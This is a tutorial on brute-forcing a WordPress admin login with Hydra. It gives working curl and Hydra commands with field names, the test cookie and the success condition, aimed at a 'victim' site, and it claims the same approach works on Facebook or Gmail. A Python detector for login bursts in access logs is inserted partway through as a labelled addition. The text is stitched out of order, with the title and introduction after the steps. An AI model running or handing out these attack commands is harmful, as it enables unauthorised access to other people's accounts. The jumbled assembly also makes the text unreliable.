- First of all, it is necessary to identify the page where they ask for the username and password: https://www.victimpage.com/wp-login.php/
- Now it is necessary to identify the name of the username text field, the password text field, as well as the “Log In” button to access WordPress and the cookie WordPress uses to identify you as a logged-in user.
- To identify the names of these elements, right-click the page and inspect the source code. You can also identify them using the “curl” command in the Linux terminal.
- This tutorial will be done using Kali Linux, so I will open the terminal and write the following command: $ curl https://www.victimpage.com/wp-login.php/
- Before anything else, it is necessary to understand how Hydra works. Basically, Hydra works with the following command: $ hydra -L /dictionary/users.txt -P /dictionary/passwords.txt victimsite.com -V https-form-post 'wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
- -L: means it will use the file with the list of users. If you use lowercase “l” instead, you can specify a single username (in case you know the victim’s username).
- -P: means it will use the file with the list of passwords.
- -V: means it will be in verbose mode, but since it is uppercase “-V”, it will show every attempt and only highlight the correct one in green. If you don’t want to see all attempts, use lowercase “-v” instead.
- https-form-post: is one of many supported services that Hydra lets you attack.
- 'wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location': shows how WordPress sends the info using the POST method to the wp-login.php page and tries to access the wp-admin.php admin page.
- Once I press “enter,” the source code of https://www.victimpage.com will appear, so I will proceed to search for the name of each element or form field (username, password, login button, and cookie). If we were not trying to crack a WordPress site, we wouldn’t use the cookie because Hydra just detects wrong logins by the error message and moves on to the next username-password combination. However, WordPress works differently; it uses a cookie to identify that you are logged in, so it is necessary to find the cookie name as well.
- WordPress is open source, so on every WordPress site, these are the names of each form field:
- Username: “log”
- Password: “pwd”
- Button: “wp-submit”
- Cookie: “testcookie”
- Having identified the name of each form field, I will run another “curl,” but this time I will send data using the “POST” method since WordPress sends data this way. This “curl” command that sends data should be done as follows: $ curl -v --data 'log=REALUSER&pwd=REALPASS&wp-submit=Log In&testcookie=1' https://www.victimpage.com/wp-login.php/
- When running the above command, if we observe the output, we will see an ERROR message saying cookies are blocked, and above it we will see the following header:
- < Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/; secure
- So, we will run the command again but now adding the cookie: $ curl -v --data 'log=REALUSER&pwd=REALPASS&wp-submit=Log In&testcookie=1' --cookie 'wordpress_test_cookie=WP+Cookie+check' https://www.victimpage.com/wp-login.php/
- Now we will see a message that the “Log In” was successful, and at the end of the message, we will see that WordPress uses the following text to identify a successful login: < Location: https://www.victimpage.com/wp-admin/
- Now it is necessary to create a “.txt” document containing all the passwords we think might be valid, one per line, so that it forms a list.
- Now, since we have the “passwords.txt” file, we need to use the following Hydra command to perform the brute force attack: $ hydra -P /path/to/password/dictionary.txt -l username yoursite.com -V https-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
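
The login exchange above leaves a recognizable trace on the server: each failed attempt is a POST to /wp-login.php answered with 200, and a successful one is answered with a redirect (the Location header). As an added example, not part of the original tutorial, this Python detector flags that pattern in web server access logs; the log lines are constructed, and the combined log format, the threshold and the time window are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample data (documentation IP ranges), not taken from a real server.
def _line(ip, sec, status, method="POST"):
    return (f'{ip} - - [10/Mar/2024:10:00:{sec:02d} +0000] '
            f'"{method} /wp-login.php HTTP/1.1" {status} 4321 "-" "-"')

SAMPLE_LOG = "\n".join(
    [_line("203.0.113.7", s, 200) for s in range(0, 12, 2)]   # 6 failures in 10 s
    + [_line("203.0.113.7", 13, 302)]                         # then a redirect
    + [_line("198.51.100.20", 20, 200), _line("198.51.100.20", 30, 302)]  # one typo
    + [_line("192.0.2.55", 40, 200, method="GET")])           # just viewing the form

# Only POSTs to the login endpoint are relevant; capture client, time and status.
LOGIN_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"POST /wp-login\.php/?(?:\?\S*)? HTTP/[\d.]+" (?P<status>\d{3}) ')

def detect(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return {ip: {"burst": True, "success_after_burst": bool}} for flagged clients."""
    failures = defaultdict(deque)  # ip -> timestamps of recent failed logins
    findings = {}
    for line in log_text.splitlines():
        m = LOGIN_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        ip, status = m["ip"], m["status"]
        recent = failures[ip]
        while recent and ts - recent[0] > window:  # drop attempts outside the window
            recent.popleft()
        if status == "200":        # login form rendered again: failed attempt
            recent.append(ts)
            if len(recent) >= threshold:
                findings.setdefault(ip, {"burst": True, "success_after_burst": False})
        elif status == "302" and ip in findings:
            # Redirect after a burst of failures: a guess may have succeeded.
            findings[ip]["success_after_burst"] = True
    return findings

if __name__ == "__main__":
    for ip, info in detect(SAMPLE_LOG).items():
        print(ip, info)
```

A client flagged with `success_after_burst` warrants a password reset and session invalidation for the targeted account, not just a block of the source address.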
Hydra WordPress Brute Force Attack
In this tutorial, I will explain in detail how to perform a brute force attack on a WordPress site. We will use the popular and powerful tool Hydra, which comes pre-installed on Kali Linux, and if you don’t have Kali Linux, you can download it for your operating system.
Hydra is a pentesting program that uses different methods such as brute force.
It allows you to use dictionaries or word lists with many combinations of different usernames or passwords to try to “Log In” or “Access” the site you want to attack.
Hydra will let you attempt to access any site that has a username and password form, for example, sites made with WordPress or Joomla, or sites such as Facebook or Gmail. However, this tutorial is focused on accessing a WordPress site where we only have the username and do not have the password.